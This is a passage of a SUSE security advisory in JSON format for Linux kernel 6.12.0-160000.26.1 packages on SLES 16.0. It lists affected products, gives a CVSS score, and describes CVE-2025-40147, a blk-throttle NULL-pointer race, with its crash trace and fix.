"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-40106"
},
{
"cve": "CVE-2025-40147",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40147"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-throttle: fix access race during throttle policy activation\n\nOn repeated cold boots we occasionally hit a NULL pointer crash in\nblk_should_throtl() when throttling is consulted before the throttle\npolicy is fully enabled for the queue. Checking only q-\u003etd != NULL is\ninsufficient during early initialization, so blkg_to_pd() for the\nthrottle policy can still return NULL and blkg_to_tg() becomes NULL,\nwhich later gets dereferenced.\n\n Unable to handle kernel NULL pointer dereference\n at virtual address 0000000000000156\n ...\n pc : submit_bio_noacct+0x14c/0x4c8\n lr : submit_bio_noacct+0x48/0x4c8\n sp : ffff800087f0b690\n x29: ffff800087f0b690 x28: 0000000000005f90 x27: ffff00068af393c0\n x26: 0000000000080000 x25: 000000000002fbc0 x24: ffff000684ddcc70\n x23: 0000000000000000 x22: 0000000000000000 x21: 0000000000000000\n x20: 0000000000080000 x19: ffff000684ddcd08 x18: ffffffffffffffff\n x17: 0000000000000000 x16: ffff80008132a550 x15: 0000ffff98020fff\n x14: 0000000000000000 x13: 1fffe000d11d7021 x12: ffff000688eb810c\n x11: ffff00077ec4bb80 x10: ffff000688dcb720 x9 : ffff80008068ef60\n x8 : 00000a6fb8a86e85 x7 : 000000000000111e x6 : 0000000000000002\n x5 : 0000000000000246 x4 : 0000000000015cff x3 : 0000000000394500\n x2 : ffff000682e35e40 x1 : 0000000000364940 x0 : 000000000000001a\n Call trace:\n submit_bio_noacct+0x14c/0x4c8\n verity_map+0x178/0x2c8\n __map_bio+0x228/0x250\n dm_submit_bio+0x1c4/0x678\n __submit_bio+0x170/0x230\n submit_bio_noacct_nocheck+0x16c/0x388\n submit_bio_noacct+0x16c/0x4c8\n submit_bio+0xb4/0x210\n f2fs_submit_read_bio+0x4c/0xf0\n f2fs_mpage_readpages+0x3b0/0x5f0\n f2fs_readahead+0x90/0xe8\n\nTighten blk_throtl_activated() to also require that the throttle policy\nbit is set on the queue:\n\n return q-\u003etd != NULL \u0026\u0026\n test_bit(blkcg_policy_throtl.plid, q-\u003eblkcg_pols);\n\nThis prevents blk_should_throtl() from accessing throttle group state\nuntil policy data has been attached to blkgs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40147",
"url": "https://www.suse.com/security/cve/CVE-2025-40147"
},
{
"category": "external",
"summary": "SUSE Bug 1253344 for CVE-2025-40147",
"url": "https://bugzilla.suse.com/1253344"
}
],
"remediations": [
{
"category": "vendor_fix",
